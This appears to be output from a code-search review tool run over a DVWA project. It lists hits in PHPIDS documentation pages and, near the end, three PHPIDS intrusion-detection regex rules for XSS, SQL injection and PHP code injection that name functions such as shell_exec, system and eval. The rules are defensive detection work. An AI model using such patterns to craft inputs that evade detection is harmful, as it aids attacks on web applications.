107-<p class="short-description">Returns an instance of this class</p>
108-	<ul class="tags">
109-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Caching_Session.html:133 (204/257) OK | Dubious | Bad | Hide 
130-			
131-	</div>
132-
133:<a name="method__construct" id="__construct"><!-- --></a>
134-<div class="evenrow">
135-	
136-	<div class="method-header">
137-		<span class="method-title">Constructor __construct</span> (line <span class="line-number">84</span>)
138-	</div> 
139-	
140:	<!-- ========== Info from phpDoc block ========= -->
141-<p class="short-description">Constructor</p>
142-	<ul class="tags">
143-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Caching_Session.html:165 (205/257) OK | Dubious | Bad | Hide 
162-		
163-			
164-	</div>
165:<a name="methodgetCache" id="getCache"><!-- --></a>
166-<div class="oddrow">
167-	
168-	<div class="method-header">
169-		<span class="method-title">getCache</span> (line <span class="line-number">129</span>)
170-	</div> 
171-	
172:	<!-- ========== Info from phpDoc block ========= -->
173-<p class="short-description">Returns the cached data</p>
174-<p class="description"><p>Note that this method returns false if either type or file cache is not set</p></p>
175-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Caching_Session.html:197 (206/257) OK | Dubious | Bad | Hide 
194-					</dl>
195-			
196-	</div>
197:<a name="methodsetCache" id="setCache"><!-- --></a>
198-<div class="evenrow">
199-	
200-	<div class="method-header">
201-		<span class="method-title">setCache</span> (line <span class="line-number">115</span>)
202-	</div> 
203-	
204:	<!-- ========== Info from phpDoc block ========= -->
205-<p class="short-description">Writes cache data into the session</p>
206-	<ul class="tags">
207-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Filter.html:5 (207/257) OK | Dubious | Bad | Hide 
2-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3-  <html xmlns="http://www.w3.org/1999/xhtml">
4-		<head>
5:			<!-- template designed by Marco Von Ballmoos -->
6-			<title>Docs For Class IDS_Filter</title>
7-			<link rel="stylesheet" href="../media/stylesheet.css" />
8-			<meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1'/>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Filter.html:24 (208/257) OK | Dubious | Bad | Hide 
21-						
22-					</div>
23-	<div class="info-box-body">
24:        		<!-- ========== Info from phpDoc block ========= -->
25-<p class="short-description">PHPIDS Filter object</p>
26-<p class="description"><p>Each object of this class serves as a container for a specific filter. The  object provides methods to get information about this particular filter and  also to match an arbitrary string against it.</p></p>
27-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Filter.html:146 (209/257) OK | Dubious | Bad | Hide 
143-							
144-					</div>
145-		<div class="info-box-body">
146:			<a name="var$description" id="$description"><!-- --></A>
147-<div class="oddrow">
148-
149-	<div class="var-header">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Filter.html:157 (210/257) OK | Dubious | Bad | Hide 
154-		</span>
155-	</div>
156-
157:	<!-- ========== Info from phpDoc block ========= -->
158-<p class="short-description">Filter description</p>
159-	<ul class="tags">
160-				<li><span class="field">access:</span> protected</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Filter.html:168 (211/257) OK | Dubious | Bad | Hide 
165-		
166-
167-</div>
168:<a name="var$impact" id="$impact"><!-- --></A>
169-<div class="evenrow">
170-
171-	<div class="var-header">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Filter.html:179 (212/257) OK | Dubious | Bad | Hide 
176-		</span>
177-	</div>
178-
179:	<!-- ========== Info from phpDoc block ========= -->
180-<p class="short-description">Filter impact level</p>
181-	<ul class="tags">
182-				<li><span class="field">access:</span> protected</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Filter.html:190 (213/257) OK | Dubious | Bad | Hide 
187-		
188-
189-</div>
190:<a name="var$rule" id="$rule"><!-- --></A>
191-<div class="oddrow">
192-
193-	<div class="var-header">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Filter.html:201 (214/257) OK | Dubious | Bad | Hide 
198-		</span>
199-	</div>
200-
201:	<!-- ========== Info from phpDoc block ========= -->
202-<p class="short-description">Filter rule</p>
203-	<ul class="tags">
204-				<li><span class="field">access:</span> protected</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Filter.html:212 (215/257) OK | Dubious | Bad | Hide 
209-		
210-
211-</div>
212:<a name="var$tags" id="$tags"><!-- --></A>
213-<div class="evenrow">
214-
215-	<div class="var-header">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Filter.html:223 (216/257) OK | Dubious | Bad | Hide 
220-		</span>
221-	</div>
222-
223:	<!-- ========== Info from phpDoc block ========= -->
224-<p class="short-description">List of tags of the filter</p>
225-	<ul class="tags">
226-				<li><span class="field">access:</span> protected</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Filter.html:250 (217/257) OK | Dubious | Bad | Hide 
247-		<div class="info-box-body">
248-			<A NAME='method_detail'></A>
249-
250:<a name="method__construct" id="__construct"><!-- --></a>
251-<div class="oddrow">
252-	
253-	<div class="method-header">
254-		<span class="method-title">Constructor __construct</span> (line <span class="line-number">93</span>)
255-	</div> 
256-	
257:	<!-- ========== Info from phpDoc block ========= -->
258-<p class="short-description">Constructor</p>
259-	<ul class="tags">
260-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Filter.html:291 (218/257) OK | Dubious | Bad | Hide 
288-		
289-			
290-	</div>
291:<a name="methodgetDescription" id="getDescription"><!-- --></a>
292-<div class="evenrow">
293-	
294-	<div class="method-header">
295-		<span class="method-title">getDescription</span> (line <span class="line-number">131</span>)
296-	</div> 
297-	
298:	<!-- ========== Info from phpDoc block ========= -->
299-<p class="short-description">Returns filter description</p>
300-	<ul class="tags">
301-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Filter.html:315 (219/257) OK | Dubious | Bad | Hide 
312-		
313-			
314-	</div>
315:<a name="methodgetId" id="getId"><!-- --></a>
316-<div class="oddrow">
317-	
318-	<div class="method-header">
319-		<span class="method-title">getId</span> (line <span class="line-number">174</span>)
320-	</div> 
321-	
322:	<!-- ========== Info from phpDoc block ========= -->
323-<p class="short-description">Get filter ID</p>
324-	<ul class="tags">
325-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Filter.html:339 (220/257) OK | Dubious | Bad | Hide 
336-		
337-			
338-	</div>
339:<a name="methodgetImpact" id="getImpact"><!-- --></a>
340-<div class="evenrow">
341-	
342-	<div class="method-header">
343-		<span class="method-title">getImpact</span> (line <span class="line-number">164</span>)
344-	</div> 
345-	
346:	<!-- ========== Info from phpDoc block ========= -->
347-<p class="short-description">Get filter impact level</p>
348-	<ul class="tags">
349-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Filter.html:363 (221/257) OK | Dubious | Bad | Hide 
360-		
361-			
362-	</div>
363:<a name="methodgetRule" id="getRule"><!-- --></a>
364-<div class="oddrow">
365-	
366-	<div class="method-header">
367-		<span class="method-title">getRule</span> (line <span class="line-number">154</span>)
368-	</div> 
369-	
370:	<!-- ========== Info from phpDoc block ========= -->
371-<p class="short-description">Returns filter rule</p>
372-	<ul class="tags">
373-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Filter.html:387 (222/257) OK | Dubious | Bad | Hide 
384-		
385-			
386-	</div>
387:<a name="methodgetTags" id="getTags"><!-- --></a>
388-<div class="evenrow">
389-	
390-	<div class="method-header">
391-		<span class="method-title">getTags</span> (line <span class="line-number">144</span>)
392-	</div> 
393-	
394:	<!-- ========== Info from phpDoc block ========= -->
395-<p class="short-description">Return list of affected tags</p>
396-<p class="description"><p>Each filter rule is concerned with a certain kind of attack vectors.  This method returns those affected kinds.</p></p>
397-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Filter.html:412 (223/257) OK | Dubious | Bad | Hide 
409-		
410-			
411-	</div>
412:<a name="methodmatch" id="match"><!-- --></a>
413-<div class="oddrow">
414-	
415-	<div class="method-header">
416-		<span class="method-title">match</span> (line <span class="line-number">113</span>)
417-	</div> 
418-	
419:	<!-- ========== Info from phpDoc block ========= -->
420-<p class="short-description">Matches a string against current filter</p>
421-<p class="description"><p>Matches given string against the filter rule the specific object of this  class represents</p></p>
422-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Log_Composite.html:5 (224/257) OK | Dubious | Bad | Hide 
2-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3-  <html xmlns="http://www.w3.org/1999/xhtml">
4-		<head>
5:			<!-- template designed by Marco Von Ballmoos -->
6-			<title>Docs For Class IDS_Log_Composite</title>
7-			<link rel="stylesheet" href="../media/stylesheet.css" />
8-			<meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1'/>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Log_Composite.html:24 (225/257) OK | Dubious | Bad | Hide 
21-						
22-					</div>
23-	<div class="info-box-body">
24:        		<!-- ========== Info from phpDoc block ========= -->
25-<p class="short-description">Log Composite</p>
26-<p class="description"><p>This class implements the composite pattern to allow to work with multiple  logging wrappers at once.</p></p>
27-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Log_Composite.html:113 (226/257) OK | Dubious | Bad | Hide 
110-							
111-					</div>
112-		<div class="info-box-body">
113:			<a name="var$loggers" id="$loggers"><!-- --></A>
114-<div class="evenrow">
115-
116-	<div class="var-header">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Log_Composite.html:124 (227/257) OK | Dubious | Bad | Hide 
121-		</span>
122-	</div>
123-
124:	<!-- ========== Info from phpDoc block ========= -->
125-<p class="short-description">Holds registered logging wrapper</p>
126-	<ul class="tags">
127-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Log_Composite.html:151 (228/257) OK | Dubious | Bad | Hide 
148-		<div class="info-box-body">
149-			<A NAME='method_detail'></A>
150-
151:<a name="methodaddLogger" id="addLogger"><!-- --></a>
152-<div class="oddrow">
153-	
154-	<div class="method-header">
155-		<span class="method-title">addLogger</span> (line <span class="line-number">84</span>)
156-	</div> 
157-	
158:	<!-- ========== Info from phpDoc block ========= -->
159-<p class="short-description">Registers a new logging wrapper</p>
160-<p class="description"><p>Only valid IDS_Log_Interface instances passed to this function will be  registered</p></p>
161-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Log_Composite.html:176 (229/257) OK | Dubious | Bad | Hide 
173-		
174-			
175-	</div>
176:<a name="methodexecute" id="execute"><!-- --></a>
177-<div class="evenrow">
178-	
179-	<div class="method-header">
180-		<span class="method-title">execute</span> (line <span class="line-number">69</span>)
181-	</div> 
182-	
183:	<!-- ========== Info from phpDoc block ========= -->
184-<p class="short-description">Iterates through registered loggers and executes them</p>
185-	<ul class="tags">
186-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Log_Composite.html:205 (230/257) OK | Dubious | Bad | Hide 
202-		
203-			
204-	</div>
205:<a name="methodremoveLogger" id="removeLogger"><!-- --></a>
206-<div class="oddrow">
207-	
208-	<div class="method-header">
209-		<span class="method-title">removeLogger</span> (line <span class="line-number">104</span>)
210-	</div> 
211-	
212:	<!-- ========== Info from phpDoc block ========= -->
213-<p class="short-description">Removes a logger</p>
214-	<ul class="tags">
215-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Log_Interface.html:5 (231/257) OK | Dubious | Bad | Hide 
2-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3-  <html xmlns="http://www.w3.org/1999/xhtml">
4-		<head>
5:			<!-- template designed by Marco Von Ballmoos -->
6-			<title>Docs For Class IDS_Log_Interface</title>
7-			<link rel="stylesheet" href="../media/stylesheet.css" />
8-			<meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1'/>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Log_Interface.html:23 (232/257) OK | Dubious | Bad | Hide 
20-						
21-					</div>
22-	<div class="info-box-body">
23:        		<!-- ========== Info from phpDoc block ========= -->
24-<p class="short-description">Interface for logging wrappers</p>
25-	<ul class="tags">
26-				<li><span class="field">author:</span> Lars Strojny &lt;<a href="mailto:lars@strojny.net">lars@strojny.net</a>&gt;</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Log_Interface.html:78 (233/257) OK | Dubious | Bad | Hide 
75-		<div class="info-box-body">
76-			<A NAME='method_detail'></A>
77-
78:<a name="methodexecute" id="execute"><!-- --></a>
79-<div class="evenrow">
80-	
81-	<div class="method-header">
82-		<span class="method-title">execute</span> (line <span class="line-number">56</span>)
83-	</div> 
84-	
85:	<!-- ========== Info from phpDoc block ========= -->
86-<p class="short-description">Interface method</p>
87-	<ul class="tags">
88-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Event.php.html:5 (234/257) OK | Dubious | Bad | Hide 
2-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3-  <html xmlns="http://www.w3.org/1999/xhtml">
4-		<head>
5:			<!-- template designed by Marco Von Ballmoos -->
6-			<title>Docs for page Event.php</title>
7-			<link rel="stylesheet" href="../media/stylesheet.css" />
8-			<meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1'/>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Event.php.html:22 (235/257) OK | Dubious | Bad | Hide 
19-							<a href="#sec-classes">Classes</a>
20-														</div>
21-	<div class="info-box-body">	
22:		<!-- ========== Info from phpDoc block ========= -->
23-<p class="short-description">PHPIDS</p>
24-<p class="description"><p>Requirements: PHP5, SimpleXML</p><p>Copyright (c) 2008 PHPIDS group (http://php-ids.org)</p><p>PHPIDS is free software; you can redistribute it and/or modify  it under the terms of the GNU Lesser General Public License as published by  the Free Software Foundation, version 3 of the License, or  (at your option) any later version.</p><p>PHPIDS is distributed in the hope that it will be useful,  but WITHOUT ANY WARRANTY; without even the implied warranty of  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the  GNU Lesser General Public License for more details.</p><p>You should have received a copy of the GNU Lesser General Public License  along with PHPIDS. If not, see &lt;http://www.gnu.org/licenses/&gt;.</p><p>PHP version 5.1.6+</p></p>
25-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Converter.html:5 (236/257) OK | Dubious | Bad | Hide 
2-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3-  <html xmlns="http://www.w3.org/1999/xhtml">
4-		<head>
5:			<!-- template designed by Marco Von Ballmoos -->
6-			<title>Docs For Class IDS_Converter</title>
7-			<link rel="stylesheet" href="../media/stylesheet.css" />
8-			<meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1'/>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Converter.html:23 (237/257) OK | Dubious | Bad | Hide 
20-						
21-					</div>
22-	<div class="info-box-body">
23:        		<!-- ========== Info from phpDoc block ========= -->
24-<p class="short-description">PHPIDS specific utility class to convert charsets manually</p>
25-<p class="description"><p>Note that if you make use of IDS_Converter::runAll(), existing class  methods will be executed in the same order as they are implemented in the  class tree!</p></p>
26-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Converter.html:163 (238/257) OK | Dubious | Bad | Hide 
160-		</div>
161-		<div class="info-box-body">
162-			<A NAME='method_detail'></A>
163:<a name="methodconvertConcatenations" id="convertConcatenations"><!-- --></a>
164-<div class="evenrow">
165-	
166-	<div class="method-header">
167-		<span class="method-title">static method convertConcatenations</span> (line <span class="line-number">506</span>)
168-	</div> 
169-	
170:	<!-- ========== Info from phpDoc block ========= -->
171-<p class="short-description">Converts basic concatenations</p>
172-	<ul class="tags">
173-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Converter.html:193 (239/257) OK | Dubious | Bad | Hide 
190-		
191-			
192-	</div>
193:<a name="methodconvertEntities" id="convertEntities"><!-- --></a>
194-<div class="oddrow">
195-	
196-	<div class="method-header">
197-		<span class="method-title">static method convertEntities</span> (line <span class="line-number">229</span>)
198-	</div> 
199-	
200:	<!-- ========== Info from phpDoc block ========= -->
201-<p class="short-description">Converts from hex/dec entities</p>
202-	<ul class="tags">
203-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Converter.html:223 (240/257) OK | Dubious | Bad | Hide 
220-		
221-			
222-	</div>
223:<a name="methodconvertFromCommented" id="convertFromCommented"><!-- --></a>
224-<div class="evenrow">
225-	
226-	<div class="method-header">
227-		<span class="method-title">static method convertFromCommented</span> (line <span class="line-number">86</span>)
228-	</div> 
229-	
230:	<!-- ========== Info from phpDoc block ========= -->
231-<p class="short-description">Check for comments and erases them if available</p>
232-	<ul class="tags">
233-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Converter.html:253 (241/257) OK | Dubious | Bad | Hide 
250-		
251-			
252-	</div>
253:<a name="methodconvertFromControlChars" id="convertFromControlChars"><!-- --></a>
254-<div class="oddrow">
255-	
256-	<div class="method-header">
257-		<span class="method-title">static method convertFromControlChars</span> (line <span class="line-number">321</span>)
258-	</div> 
259-	
260:	<!-- ========== Info from phpDoc block ========= -->
261-<p class="short-description">Detects nullbytes and controls chars via ord()</p>
262-	<ul class="tags">
263-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Converter.html:283 (242/257) OK | Dubious | Bad | Hide 
280-		
281-			
282-	</div>
283:<a name="methodconvertFromJSCharcode" id="convertFromJSCharcode"><!-- --></a>
284-<div class="evenrow">
285-	
286-	<div class="method-header">
287-		<span class="method-title">static method convertFromJSCharcode</span> (line <span class="line-number">134</span>)
288-	</div> 
289-	
290:	<!-- ========== Info from phpDoc block ========= -->
291-<p class="short-description">Checks for common charcode pattern and decodes them</p>
292-	<ul class="tags">
293-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Converter.html:313 (243/257) OK | Dubious | Bad | Hide 
310-		
311-			
312-	</div>
313:<a name="methodconvertFromJSUnicode" id="convertFromJSUnicode"><!-- --></a>
314-<div class="oddrow">
315-	
316-	<div class="method-header">
317-		<span class="method-title">static method convertFromJSUnicode</span> (line <span class="line-number">422</span>)
318-	</div> 
319-	
320:	<!-- ========== Info from phpDoc block ========= -->
321-<p class="short-description">This method converts JS unicode code points to  regular characters</p>
322-	<ul class="tags">
323-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Converter.html:343 (244/257) OK | Dubious | Bad | Hide 
340-		
341-			
342-	</div>
343:<a name="methodconvertFromNestedBase64" id="convertFromNestedBase64"><!-- --></a>
344-<div class="evenrow">
345-	
346-	<div class="method-header">
347-		<span class="method-title">static method convertFromNestedBase64</span> (line <span class="line-number">359</span>)
348-	</div> 
349-	
350:	<!-- ========== Info from phpDoc block ========= -->
351-<p class="short-description">This method matches and translates base64 strings and fragments  used in data URIs</p>
352-	<ul class="tags">
353-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Converter.html:373 (245/257) OK | Dubious | Bad | Hide 
370-		
371-			
372-	</div>
373:<a name="methodconvertFromNewLines" id="convertFromNewLines"><!-- --></a>
374-<div class="oddrow">
375-	
376-	<div class="method-header">
377-		<span class="method-title">static method convertFromNewLines</span> (line <span class="line-number">116</span>)
378-	</div> 
379-	
380:	<!-- ========== Info from phpDoc block ========= -->
381-<p class="short-description">Strip newlines</p>
382-	<ul class="tags">
383-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Converter.html:403 (246/257) OK | Dubious | Bad | Hide 
400-		
401-			
402-	</div>
403:<a name="methodconvertFromOutOfRangeChars" id="convertFromOutOfRangeChars"><!-- --></a>
404-<div class="evenrow">
405-	
406-	<div class="method-header">
407-		<span class="method-title">static method convertFromOutOfRangeChars</span> (line <span class="line-number">383</span>)
408-	</div> 
409-	
410:	<!-- ========== Info from phpDoc block ========= -->
411-<p class="short-description">Detects nullbytes and controls chars via ord()</p>
412-	<ul class="tags">
413-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Converter.html:433 (247/257) OK | Dubious | Bad | Hide 
430-		
431-			
432-	</div>
433:<a name="methodconvertFromProprietaryEncodings" id="convertFromProprietaryEncodings"><!-- --></a>
434-<div class="oddrow">
435-	
436-	<div class="method-header">
437-		<span class="method-title">static method convertFromProprietaryEncodings</span> (line <span class="line-number">558</span>)
438-	</div> 
439-	
440:	<!-- ========== Info from phpDoc block ========= -->
441-<p class="short-description">This method collects and decodes proprietary encoding types</p>
442-	<ul class="tags">
443-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Converter.html:466 (248/257) OK | Dubious | Bad | Hide 
463-		
464-			
465-	</div>
466:<a name="methodconvertFromSQLHex" id="convertFromSQLHex"><!-- --></a>
467-<div class="evenrow">
468-	
469-	<div class="method-header">
470-		<span class="method-title">static method convertFromSQLHex</span> (line <span class="line-number">266</span>)
471-	</div> 
472-	
473:	<!-- ========== Info from phpDoc block ========= -->
474-<p class="short-description">Converts SQLHEX to plain text</p>
475-	<ul class="tags">
476-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Converter.html:496 (249/257) OK | Dubious | Bad | Hide 
493-		
494-			
495-	</div>
496:<a name="methodconvertFromSQLKeywords" id="convertFromSQLKeywords"><!-- --></a>
497-<div class="oddrow">
498-	
499-	<div class="method-header">
500-		<span class="method-title">static method convertFromSQLKeywords</span> (line <span class="line-number">291</span>)
501-	</div> 
502-	
503:	<!-- ========== Info from phpDoc block ========= -->
504-<p class="short-description">Converts basic SQL keywords and obfuscations</p>
505-	<ul class="tags">
506-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Converter.html:526 (250/257) OK | Dubious | Bad | Hide 
523-		
524-			
525-	</div>
526:<a name="methodconvertFromUTF7" id="convertFromUTF7"><!-- --></a>
527-<div class="evenrow">
528-	
529-	<div class="method-header">
530-		<span class="method-title">static method convertFromUTF7</span> (line <span class="line-number">449</span>)
531-	</div> 
532-	
533:	<!-- ========== Info from phpDoc block ========= -->
534-<p class="short-description">Converts relevant UTF-7 tags to UTF-8</p>
535-	<ul class="tags">
536-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Converter.html:556 (251/257) OK | Dubious | Bad | Hide 
553-		
554-			
555-	</div>
556:<a name="methodconvertFromXML" id="convertFromXML"><!-- --></a>
557-<div class="oddrow">
558-	
559-	<div class="method-header">
560-		<span class="method-title">static method convertFromXML</span> (line <span class="line-number">403</span>)
561-	</div> 
562-	
563:	<!-- ========== Info from phpDoc block ========= -->
564-<p class="short-description">Strip XML patterns</p>
565-	<ul class="tags">
566-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Converter.html:586 (252/257) OK | Dubious | Bad | Hide 
583-		
584-			
585-	</div>
586:<a name="methodconvertJSRegexModifiers" id="convertJSRegexModifiers"><!-- --></a>
587-<div class="evenrow">
588-	
589-	<div class="method-header">
590-		<span class="method-title">static method convertJSRegexModifiers</span> (line <span class="line-number">214</span>)
591-	</div> 
592-	
593:	<!-- ========== Info from phpDoc block ========= -->
594-<p class="short-description">Eliminate JS regex modifiers</p>
595-	<ul class="tags">
596-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Converter.html:616 (253/257) OK | Dubious | Bad | Hide 
613-		
614-			
615-	</div>
616:<a name="methodconvertQuotes" id="convertQuotes"><!-- --></a>
617-<div class="oddrow">
618-	
619-	<div class="method-header">
620-		<span class="method-title">static method convertQuotes</span> (line <span class="line-number">249</span>)
621-	</div> 
622-	
623:	<!-- ========== Info from phpDoc block ========= -->
624-<p class="short-description">Normalize quotes</p>
625-	<ul class="tags">
626-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Converter.html:646 (254/257) OK | Dubious | Bad | Hide 
643-		
644-			
645-	</div>
646:<a name="methodrunAll" id="runAll"><!-- --></a>
647-<div class="evenrow">
648-	
649-	<div class="method-header">
650-		<span class="method-title">static method runAll</span> (line <span class="line-number">65</span>)
651-	</div> 
652-	
653:	<!-- ========== Info from phpDoc block ========= -->
654-<p class="short-description">Runs all converter functions</p>
655-<p class="description"><p>Note that if you make use of IDS_Converter::runAll(), existing class  methods will be executed in the same order as they are implemented in the  class tree!</p></p>
656-	<ul class="tags">
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/IDS_Converter.html:677 (255/257) OK | Dubious | Bad | Hide 
674-		
675-			
676-	</div>
677:<a name="methodrunCentrifuge" id="runCentrifuge"><!-- --></a>
678-<div class="oddrow">
679-	
680-	<div class="method-header">
681-		<span class="method-title">static method runCentrifuge</span> (line <span class="line-number">603</span>)
682-	</div> 
683-	
684:	<!-- ========== Info from phpDoc block ========= -->
685-<p class="short-description">This method is the centrifuge prototype</p>
686-	<ul class="tags">
687-				<li><span class="field">access:</span> public</li>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Filter---Storage.php.html:5 (256/257) OK | Dubious | Bad | Hide 
2-<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3-  <html xmlns="http://www.w3.org/1999/xhtml">
4-		<head>
5:			<!-- template designed by Marco Von Ballmoos -->
6-			<title>Docs for page Storage.php</title>
7-			<link rel="stylesheet" href="../media/stylesheet.css" />
8-			<meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1'/>
./external/phpids/0.6/docs/phpdocumentor/PHPIDS/_Filter---Storage.php.html:22 (257/257) OK | Dubious | Bad | Hide 
19-							<a href="#sec-classes">Classes</a>
20-														</div>
21-	<div class="info-box-body">	
22:		<!-- ========== Info from phpDoc block ========= -->
23-<p class="short-description">PHPIDS</p>
24-<p class="description"><p>Requirements: PHP5, SimpleXML</p><p>Copyright (c) 2008 PHPIDS group (http://php-ids.org)</p><p>PHPIDS is free software; you can redistribute it and/or modify  it under the terms of the GNU Lesser General Public License as published by  the Free Software Foundation, version 3 of the License, or  (at your option) any later version.</p><p>PHPIDS is distributed in the hope that it will be useful,  but WITHOUT ANY WARRANTY; without even the implied warranty of  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the  GNU Lesser General Public License for more details.</p><p>You should have received a copy of the GNU Lesser General Public License  along with PHPIDS. If not, see &lt;http://www.gnu.org/licenses/&gt;.</p><p>PHP version 5.1.6+</p></p>
25-	<ul class="tags">

java

execute (3) Top | Hide

./external/phpids/0.6/lib/IDS/default_filter.xml:171 (1/3) OK | Dubious | Bad | Hide 
169-    <filter>
170-        <id>16</id>
171:        <rule><![CDATA[([^*\s\w,.\/?+-]\s*)?(?<![a-mo-z]\s)(?<![a-z\/_@>\-\|])(\s*return\s*)?(?:alert|showmodaldialog|infinity|isnan|isnull|msgbox|expression|prompt|write(?:ln)?|confirm|dialog|urn|(?:un)?eval|exec|execscript|tostring|status|execute|window|unescape|navigate)(?(1)[^\w%"]|(?:\s*[^@\s\w%",.:\/+\-]))]]></rule>
172-        <description>Detects possible includes and typical script methods</description>
173-        <tags>
174-            <tag>xss</tag>
./external/phpids/0.6/lib/IDS/default_filter.xml:606 (2/3) OK | Dubious | Bad | Hide 
603-    </filter>
604-    <filter>
605-        <id>56</id>
606:        <rule><![CDATA[(?:merge.*using\s*\()|(execute\s*immediate\s*")|(?:\W+\d*\s+having\s+\d)|(?:match\s*[\w(),+-]+\s*against\s*\()]]></rule>
607-        <description>Detects MATCH AGAINST, MERGE, EXECUTE IMMEDIATE and HAVING injections</description>
608-        <tags>
609-            <tag>sqli</tag>
./external/phpids/0.6/lib/IDS/default_filter.xml:637 (3/3) OK | Dubious | Bad | Hide 
634-    </filter>   
635-    <filter>
636-        <id>59</id>
637:        <rule><![CDATA[(?:(?:[;]+|(<[?%](?:php)?)).*(?:define|eval|file_get_contents|include|require|require_once|set|shell_exec|phpinfo|system|passthru|preg_\w+|execute)\s*["(@])]]></rule>
638-        <description>Detects code injection attempts 2/3</description>
639-        <tags>
640-            <tag>id</tag>

js

eval (1) Top | Hide

./dvwa/js/dvwaPage.js:6 (1/1) OK | Dubious | Bad | Hide 
4-	day = new Date();
5-	id = day.getTime();
